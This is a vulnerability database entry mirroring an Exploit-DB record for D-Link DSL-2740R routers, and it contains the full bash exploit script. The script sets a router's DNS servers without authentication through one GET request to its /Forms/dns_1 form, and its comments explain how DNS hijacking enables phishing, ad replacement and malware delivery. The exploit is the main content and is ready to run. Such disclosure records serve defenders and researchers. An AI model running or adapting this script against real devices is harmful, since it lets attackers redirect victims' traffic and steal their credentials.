Details of VAR-E-201501-0340

ID

VAR-E-201501-0340

EDB ID

35917

TITLE

D-Link DSL-2740R - Remote DNS Change - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35917

DESCRIPTION

D-Link DSL-2740R - Remote DNS Change. CVE-117675 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 35917

AFFECTED PRODUCTS

vendor:

d link

model:

dsl-2740r

scope:

version:

Trust: 1.6

sources: EXPLOIT-DB: 35917 // EDBNET: 57300

EXPLOIT

#!/bin/bash
#
# D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
echo " Example: $0 192.168.1.1 8.8.8.8"
echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
echo " http://www.ethical-hacker.org/"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1

Trust: 1.0

sources: EXPLOIT-DB: 35917

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 35917

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35917

TYPE

Remote DNS Change

Trust: 1.0

sources: EXPLOIT-DB: 35917

CREDITS

Todor Donev

Trust: 0.6

sources: EXPLOIT-DB: 35917

EXTERNAL IDS

db:	EXPLOIT-DB	id:	35917	Trust: 1.6
db:	EDBNET	id:	57300	Trust: 0.6

sources: EXPLOIT-DB: 35917 // EDBNET: 57300

REFERENCES

url:

https://www.exploit-db.com/exploits/35917/

Trust: 0.6

sources: EDBNET: 57300

SOURCES

db:	EXPLOIT-DB	id:	35917
db:	EDBNET	id:	57300

LAST UPDATE DATE

2022-07-27T09:27:23.631000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	35917	date:	2015-01-27T00:00:00
db:	EDBNET	id:	57300	date:	2015-01-27T00:00:00